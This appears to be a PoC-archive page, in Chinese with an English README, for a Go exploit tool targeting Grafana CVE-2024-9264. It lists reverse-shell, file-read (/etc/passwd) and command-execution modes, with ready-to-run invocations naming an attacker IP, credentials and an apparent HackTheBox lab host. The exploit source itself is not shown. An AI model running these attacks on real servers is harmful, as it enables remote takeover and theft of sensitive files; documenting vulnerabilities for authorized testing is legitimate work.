关联漏洞
标题:
Grafana 安全漏洞
(CVE-2024-9264)
描述:Grafana是Grafana开源的一套提供可视化监控界面的开源监控工具。该工具主要用于监控和分析Graphite、InfluxDB和Prometheus等。 Grafana存在安全漏洞,该漏洞源于SQL表达式实验性功能在处理用户输入的duckdb查询时,未能充分清理,导致命令注入和本地文件包含漏洞。
描述
A go implementation for CVE-2024-9264 which effect grafana versions 11.0.x, 11.1.x, and 11.2.x.
介绍
# 🚨 CVE-2024-9264 - Grafana SQL injection leading to Remote Code Execution (RCE) and file Read
Exploit tool for [CVE-2024-9264](https://grafana.com/blog/2024/10/17/grafana-security-release-critical-severity-fix-for-cve-2024-9264/), a **critical vulnerability in Grafana** allow authenticated attcker to execute sql query leading to RCE
> 🛡️ This tool is strictly for **educational purposes** and **authorized penetration testing**.
> Unauthorized use is illegal and unethical.
---
## 🧠 Vulnerability Overview
### 🕳️ What is CVE-2024-9264?
**CVE-2024-9264** is a critical flaw in Grafana allows authenticated attacker to execute sql commands leading to RCE and file read
### 🧬 Root Cause
- Insufficient sanitization.
### 💥 Impact
- **RCE**: Execute arbitrary commands, get reverse shells, or read sensitive files.
- **High Severity**: Complete server takeover possible if successful.
---
## ⚒️ Features
- Supports multiple attack modes:
- `file` – Read arbitrary files (e.g., `/etc/passwd`)
- `shell` – Reverse shell to attacker machine
- `command` – Run arbitrary shell commands (e.g., `whoami`)
- Customizable attacker IP, port, and credentials
---
## 🚀 Usage
Not all of the arguments are nessary.
## examples
### Getting shell
``` go run main.go -ip 10.10.16.91 -port 8080 -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type shell ```
### Read files
``` go run main.go -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type file -filename /etc/passwd```
### Execuet single command
``` go run main.go -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type command -cmd 'ls -al' ```
### 🔧 Command-Line Flags
``` go run main.go [flags] ```
文件快照
[4.0K] /data/pocs/36df6b1d338babf392a21304dc132d6d442fe9dd
├── [ 32] go.mod
├── [4.0K] img
│ └── [160K] cmd.png
├── [5.4K] main.go
└── [1.8K] README.md
1 directory, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。